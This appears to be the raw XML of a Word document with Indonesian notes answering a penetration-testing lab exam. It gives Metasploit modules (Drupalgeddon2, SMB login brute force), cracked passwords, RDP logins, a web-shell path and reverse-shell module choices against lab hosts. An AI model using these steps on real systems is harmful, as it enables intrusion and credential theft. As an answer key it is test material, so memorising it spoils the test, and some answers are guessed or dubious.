        <w:t>login ke 192.168.100.50/wp-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF81918" w14:textId="4FA55A37" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
        <w:t>ke settingan cari thema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D36F8" w14:textId="77777777" w:rsidR="006378A3" w:rsidRPr="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006378A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the IP address of the host vulnerable to an SSH brute-force attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17DB2D" w14:textId="77777777" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r w:rsidRPr="006378A3">
        <w:t>192.168.100.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C9E4F" w14:textId="77777777" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r>
        <w:t>Nmap -sV -p 22 IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54601C27" w14:textId="45E8D903" w:rsidR="006378A3" w:rsidRDefault="006378A3" w:rsidP="006378A3">
      <w:r w:rsidRPr="006378A3">
        <w:t>(jawabannya yang paling maasuk akal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .52 </w:t>
      </w:r>
      <w:r w:rsidRPr="006378A3">
        <w:t>, .50 dan 51 tidak open port utk ssh, .54 tidak up)</w:t>
      </w:r>
      <w:r w:rsidRPr="006378A3">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="783D2883" w14:textId="77777777" w:rsidR="008E39C2" w:rsidRPr="008E39C2" w:rsidRDefault="008E39C2" w:rsidP="008E39C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E39C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How many user accounts can be enumerated from the SAMBA server running on the system hosting Drupal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536EBE25" w14:textId="77777777" w:rsidR="008E39C2" w:rsidRDefault="008E39C2" w:rsidP="008E39C2">
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD859C" w14:textId="77777777" w:rsidR="008E39C2" w:rsidRDefault="008E39C2" w:rsidP="008E39C2">
      <w:r>
        <w:t>Enumared smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E90DD" w14:textId="77777777" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="008E39C2"/>
    <w:p w14:paraId="2A2E4013" w14:textId="77777777" w:rsidR="006C008B" w:rsidRPr="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C008B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What type of vulnerability can be exploited on the Drupal site?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187AD092" w14:textId="3B61ADCE" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r w:rsidRPr="006C008B">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44003A" w14:textId="77777777" w:rsidR="006C008B" w:rsidRPr="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r>
        <w:t xml:space="preserve">Pake module </w:t>
      </w:r>
      <w:r w:rsidRPr="006C008B">
        <w:t>use exploit/unix/webapp/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43727D23" w14:textId="52303D6E" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r>
        <w:t>Itu jenis nya RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFF08A" w14:textId="77777777" w:rsidR="006C008B" w:rsidRPr="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C008B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the subnet of the internal network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B64F8" w14:textId="77777777" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r w:rsidRPr="006C008B">
        <w:t>192.168.0.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (pivoting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2DD7F" w14:textId="77777777" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r>
        <w:t>IP 1 segment 192.168.100.0/24 masuk ke subnet atas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E376AC3" w14:textId="77777777" w:rsidR="006C008B" w:rsidRPr="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C008B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Which one of the following meterpreter commands can be used to add a network route?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB57DA3" w14:textId="29E2BCC8" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30519DC9" w14:textId="5ED70C3A" w:rsidR="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r>
        <w:t>Cek chatgpt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47F090" w14:textId="77777777" w:rsidR="006C008B" w:rsidRPr="006C008B" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C008B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the password of the user account "mary" on WINSERVER-03?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857CF15" w14:textId="18BB4647" w:rsidR="006C008B" w:rsidRDefault="00E07326" w:rsidP="006C008B">
      <w:r>
        <w:t>hotmama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F75C74" w14:textId="77777777" w:rsidR="00E07326" w:rsidRDefault="006C008B" w:rsidP="006C008B">
      <w:r w:rsidRPr="006C008B">
        <w:t>auxiliary/scanner/smb/smb_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C20B46" w14:textId="77777777" w:rsidR="00E07326" w:rsidRDefault="00E07326" w:rsidP="006C008B">
      <w:r>
        <w:t>set smbuser mary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828E360" w14:textId="234FA098" w:rsidR="00E07326" w:rsidRDefault="00E07326" w:rsidP="006C008B">
      <w:r>
        <w:t>set pass_file /usr/share/wordlist/rockyou.txt (di unzip dulu file rockyou nya)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07E7D5" w14:textId="2E802924" w:rsidR="006C008B" w:rsidRDefault="00E07326" w:rsidP="006C008B">
      <w:r>
        <w:t>set verbose false</w:t>
      </w:r>
      <w:r w:rsidR="006C008B" w:rsidRPr="006C008B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E07326">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B72891" wp14:editId="43C6FDD6">
            <wp:extent cx="5039995" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="147564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407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6F6A" w14:textId="77777777" w:rsidR="00E07326" w:rsidRPr="00E07326" w:rsidRDefault="00E07326" w:rsidP="00E07326">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the password for the user "mike" on WINSERVER-01?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57187FEB" w14:textId="29D3A801" w:rsidR="00E07326" w:rsidRDefault="00E07326" w:rsidP="00E07326">
      <w:r w:rsidRPr="00E07326">
        <w:t>diamond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417CD300" w14:textId="3077A583" w:rsidR="00E07326" w:rsidRDefault="00E07326" w:rsidP="00E07326">
      <w:r w:rsidRPr="00E07326">
        <w:t>xfreerdp /u:</w:t>
      </w:r>
      <w:r>
        <w:t>mike</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07326">
        <w:t xml:space="preserve"> /p:</w:t>
      </w:r>
      <w:r>
        <w:t>diamond</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07326">
        <w:t xml:space="preserve"> /v:1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.100.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1178B" w14:textId="040DABF5" w:rsidR="00E07326" w:rsidRDefault="00E07326" w:rsidP="00E07326">
      <w:r>
        <w:t>validasinya coba ganti password nya satu satu di pilihan gandanya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44371318" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRPr="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3C6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What host within the DMZ network can be exploited via command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9FDCF1" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>Dirb 192.168.100.51 (webiis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314543E8" w14:textId="68C79E98" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t xml:space="preserve">Akses </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="003F7A53">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.100.51/aspnet_client/cmdasp.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C74BF9F" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>Bisa input command injection di inputan pake command windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF97DD0" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRPr="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3C6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the name of the vulnerable web app running on the Linux server in the internal network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF9A7B" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>Webmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A4DC1" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>Dari artefak sebelumnya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03344FD3" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRPr="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3C6F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B3C6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the password for the "admin" user account on WordPress?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB5774" w14:textId="7E4F8B1D" w:rsidR="009B3C6F" w:rsidRPr="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>estrella</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C0E13" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>dapet dari yg sebelumnya nyari thema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF4242" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRPr="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3C6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What WordPress file stores the database configuration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73325007" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r w:rsidRPr="009B3C6F">
        <w:t>wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040DDDF" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:r>
        <w:t>secara default disitu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E7DA0C" w14:textId="77777777" w:rsidR="009B3C6F" w:rsidRPr="009B3C6F" w:rsidRDefault="009B3C6F" w:rsidP="009B3C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3C6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What version of WordPress is running on WINSERVER-01?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCB703" w14:textId="77777777" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:r w:rsidRPr="00272556">
        <w:lastRenderedPageBreak/>
        <w:t>5.9.3</w:t>
      </w:r>
      <w:r w:rsidR="009B3C6F" w:rsidRPr="009B3C6F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00272556">
        <w:t>view-source:http://192.168.100.50/home</w:t>
      </w:r>
      <w:r w:rsidR="009B3C6F" w:rsidRPr="009B3C6F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009B3C6F" w:rsidRPr="009B3C6F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00272556">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What host on the DMZ network is running a database server on port 3307?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8CFF18" w14:textId="36A30006" w:rsidR="00E07326" w:rsidRPr="00E07326" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:r w:rsidRPr="00272556">
        <w:t>192.168.100.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C5A968" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00E07326">
      <w:r>
        <w:t>Dari hasil scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B0C1B" w14:textId="77777777" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272556">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the version of the Linux kernel running on the system hosting the Drupal site?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925EC7F" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:r w:rsidRPr="00272556">
        <w:t>5.13.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00272556">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E07326" w:rsidRPr="00E07326">
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">masuk ke aja pake modul </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7ACAC4" w14:textId="77777777" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:r w:rsidRPr="00272556">
        <w:t>use exploit/unix/webapp/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47F8F3" w14:textId="6D4456AC" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>sysinfo (dimeterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE5AFB" w14:textId="77777777" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272556">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Excluding the guest account, how many user accounts are present on WINSERVER-01?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19367168" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF2E154" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Cat /etc/passwd (dimeterpreter nya drupal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E3B4B" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>/binbash/ ada 4 user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D9285" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE1EDCE" w14:textId="77777777" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272556">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the total number of open TCP ports running on WINSERVER-02?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B84EE" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADC186" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Nmap semua port nya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D013D" w14:textId="77777777" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272556">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What host on the network contains a user account called "lawrence"?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F28AB1" w14:textId="77777777" w:rsidR="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00272556">
        <w:t>WINSERVER-03</w:t>
      </w:r>
      <w:r w:rsidRPr="00272556">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00272556">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>rdp ke 192.168.100.55 pake xfreerdp pake password yg diatas liat lagi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD9A2D" w14:textId="71F88AEF" w:rsidR="00272556" w:rsidRPr="00272556" w:rsidRDefault="00272556" w:rsidP="00272556">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1788"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Ke terminal net users</w:t>
      </w:r>
      <w:r w:rsidRPr="00272556">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00986D88" w:rsidRPr="00986D88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F6D80D" wp14:editId="3708D789">
            <wp:extent cx="5039995" cy="1281430"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="126808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838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6E12" w14:textId="77777777" w:rsidR="00986D88" w:rsidRDefault="006C008B" w:rsidP="00986D88">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00986D88" w:rsidRPr="00986D88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Which one of the following user accounts is present on WINSERVER-02?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54256A96" w14:textId="4E6B06E8" w:rsidR="00986D88" w:rsidRPr="00986D88" w:rsidRDefault="00986D88" w:rsidP="00986D88">
      <w:r w:rsidRPr="00986D88">
        <w:lastRenderedPageBreak/>
        <w:t>steven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A314CBF" w14:textId="5C5B5BE3" w:rsidR="00986D88" w:rsidRDefault="00986D88" w:rsidP="00986D88">
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="003F7A53">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.100.51/aspnet_client/cmdasp.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A3A2F09" w14:textId="2B3CD015" w:rsidR="006C008B" w:rsidRDefault="00986D88" w:rsidP="00986D88">
      <w:r>
        <w:t>input “net users”</w:t>
      </w:r>
      <w:r w:rsidRPr="00986D88">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00986D88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57077A1D" wp14:editId="735F9EF1">
            <wp:extent cx="5039995" cy="1289050"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="1185817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1769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8E48" w14:textId="77777777" w:rsidR="00471833" w:rsidRPr="00471833" w:rsidRDefault="008E39C2" w:rsidP="00471833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E39C2">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00471833" w:rsidRPr="00471833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The server hosting Drupal contains the file /home/auditor/flag.txt. What is the value of the flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B479E5" w14:textId="77777777" w:rsidR="00471833" w:rsidRDefault="00471833" w:rsidP="00471833"/>
    <w:p w14:paraId="086C9449" w14:textId="77777777" w:rsidR="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:r>
        <w:t>Kan tadi udah dapet tuh akses root drupal diatas tinggal cat foldernya aja ini isinya bisa beda beda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D46222" w14:textId="77777777" w:rsidR="00471833" w:rsidRPr="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00471833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A system contains the file C:\Users\mike\Documents\flag.txt; what is the value of the flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A6377" w14:textId="77777777" w:rsidR="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:r>
        <w:t>Pake xfreerdp ke IP 192.168.100.50 &gt; cari path nya di file manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680F750" w14:textId="77777777" w:rsidR="00471833" w:rsidRDefault="00471833" w:rsidP="00471833"/>
    <w:p w14:paraId="2BF27643" w14:textId="77777777" w:rsidR="00471833" w:rsidRPr="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00471833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Windows utility can be used to download files from a remote web server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4157A" w14:textId="156E544B" w:rsidR="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:r w:rsidRPr="00471833">
        <w:t>Wget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F94AD5" w14:textId="77777777" w:rsidR="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:r>
        <w:t>Googling aja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8CCA3E" w14:textId="77777777" w:rsidR="00471833" w:rsidRPr="00471833" w:rsidRDefault="00471833" w:rsidP="00471833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00471833">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the value of the flag /root/flag.txt on the host running Drupal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E074B8" w14:textId="77777777" w:rsidR="00A76ADA" w:rsidRPr="00A76ADA" w:rsidRDefault="00471833" w:rsidP="00A76ADA">
      <w:r>
        <w:t>Kan udah dapet tadi diatas root nya cari aja path nya</w:t>
      </w:r>
      <w:r w:rsidRPr="00471833">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00471833">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00471833">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A76ADA" w:rsidRPr="00A76ADA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Which one of the following MSF modules can be used to obtain an elevated reverse shell on WINSERVER-02?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D369C67" w14:textId="786C40AB" w:rsidR="008E39C2" w:rsidRDefault="00A76ADA" w:rsidP="00A76ADA">
      <w:r w:rsidRPr="00A76ADA">
        <w:t>exploit/windows/ftp/ms09_053_ftpd_nlst</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76ADA">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00471833" w:rsidRPr="00471833">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>coba aja pake modulnya trus testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911C513" w14:textId="25D93835" w:rsidR="00A76ADA" w:rsidRDefault="00AC57F9" w:rsidP="00A76ADA">
      <w:r w:rsidRPr="00AC57F9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194E12D6" wp14:editId="40195B87">
            <wp:extent cx="5039995" cy="2870835"/>
